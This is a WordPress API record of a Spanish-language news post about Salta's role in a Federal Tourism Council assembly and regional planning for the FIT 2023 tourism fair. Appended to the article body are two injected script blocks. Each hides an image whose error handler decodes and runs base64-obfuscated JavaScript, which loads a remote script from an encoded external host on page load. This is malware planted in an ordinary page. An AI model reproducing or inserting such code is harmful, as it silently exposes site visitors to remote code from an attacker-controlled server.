{"id":2544,"date":"2023-04-21T14:25:13","date_gmt":"2023-04-21T17:25:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2544"},"modified":"2025-08-14T00:18:26","modified_gmt":"2025-08-14T03:18:26","slug":"salta-participo-de-la-asamblea-extraordinaria-del-cft","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2544","title":{"rendered":"Salta particip\u00f3 de la asamblea extraordinaria del CFT"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#690a21\"><em>En el marco de una nueva edici\u00f3n de Meet Up, se realiz\u00f3 la asamblea extraordinaria del Consejo Federal de Turismo encabezada por el ministro de Turismo y Deportes de la Naci\u00f3n Mat\u00edas Lammens. El ministro Mario Pe\u00f1a represent\u00f3 a la provincia.<\/em><\/h4>\n\n\n\n<p>Durante el encuentro del Consejo Federal de Turismo, en el que estuvieron presentes el ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;<strong>Mat\u00edas Lammens<\/strong>, su par de Salta,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, y dem\u00e1s ministros del \u00e1rea provinciales se present\u00f3 el Plan Integral de Calidad y Formaci\u00f3n para el 2023 y se firmaron convenios de colaboraci\u00f3n con instituciones y c\u00e1maras representantes del sector privado como la C\u00e1mara Argentina de Turismo, AHT, AOCA, FEHGRA Y FAEVYT.<\/p>\n\n\n\n<p>Asimismo, se oficializaron acuerdos de colaboraci\u00f3n con rectores de universidades nacionales a fin de ampliar las propuestas de formaci\u00f3n. \u201c\u201cLas universidades nacionales han cumplido un rol absolutamente determinante, recibiendo a miles y miles de j\u00f3venes que son primera generaci\u00f3n de egresados en todo el pa\u00eds\u201d, destac\u00f3 Lammens.<\/p>\n\n\n\n<p>Cabe destacar que la Provincia de Salta, a trav\u00e9s del programa \u201cTurismo te capacita\u201d, ha establecido un nutrido calendario de formaci\u00f3n libre y gratuito para toda la cadena tur\u00edstica. \u201cLa decisi\u00f3n del gobernador S\u00e1enz de generar m\u00e1s oportunidades para los salte\u00f1os va de la mano de la acci\u00f3n concreta de generar espacios de capacitaci\u00f3n para todos los emprendedores y aquellas personas que quieren iniciarse en la actividad\u201d, destac\u00f3 el ministro Pe\u00f1a.<\/p>\n\n\n\n<p>Participaron de la asamblea del CFT la secretaria de Promoci\u00f3n Tur\u00edstica de la Naci\u00f3n, Yanina Mart\u00ednez; el secretario Ejecutivo del Inprotur, Ricardo Sosa; el presidente del Consejo Federal de Turismo, Sebasti\u00e1n Giobellina; el presidente de la C\u00e1mara Argentina de Turismo, Gustavo Hani; la presidenta de AOCA, Patricia Dur\u00e1n Vaca,<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6753-salta-participo-de-la-asamblea-extraordinaria-del-cft.jpg\" alt=\"\" width=\"321\" height=\"212\"\/><\/figure><\/div>\n\n\n<p><strong>El Ente Norte planifica la participaci\u00f3n en FIT 2023<\/strong><\/p>\n\n\n\n<p>En el marco de una nueva edici\u00f3n de Meet Up, los ministros de turismo del Norte mantuvieron una nueva asamblea donde se abord\u00f3 la planificaci\u00f3n de lo que ser\u00e1 la participaci\u00f3n de Salta, Santiago del Estero, Tucum\u00e1n, Jujuy, Catamarca y La Rioja, en la feria tur\u00edstica m\u00e1s importante del calendario nacional.<\/p>\n\n\n\n<p>\u201cNuestro objetivo es fortalecer el proceso de crecimiento que tiene la actividad a nivel regional y pa\u00eds, tal cual lo demuestran los informes de INDEC, para ello el trabajo en equipo entre los destinos es central. Por ese motivo, seguimos avanzando en la planificaci\u00f3n conjunta de lo que ser\u00e1 la participaci\u00f3n de las 6 provincias en la edici\u00f3n 2023 de FIT\u201d.<\/p>\n\n\n\n<p>De acuerdo al informe de \u201cGeneraci\u00f3n de ingreso\u201d, publicado por el Instituto Nacional de Estrad\u00edsticas y Censo, las actividades hoteleras y gastron\u00f3micas encabezan el ranking de los rubros protagonistas en el proceso de recuperaci\u00f3n econ\u00f3mica nacional.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-participo-de-la-asamblea-extraordinaria-del-cft-89214\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de una nueva edici\u00f3n de Meet Up, se realiz\u00f3 la asamblea extraordinaria del Consejo Federal de Turismo encabezada por el ministro de Turismo y Deportes de la Naci\u00f3n Mat\u00edas Lammens. El ministro Mario Pe\u00f1a represent\u00f3 a la provincia. Durante el encuentro del Consejo Federal de Turismo, en el que estuvieron presentes el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2545,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-2544","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2544"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2544"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2544\/revisions"}],"predecessor-version":[{"id":7106,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2544\/revisions\/7106"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2545"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2544"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}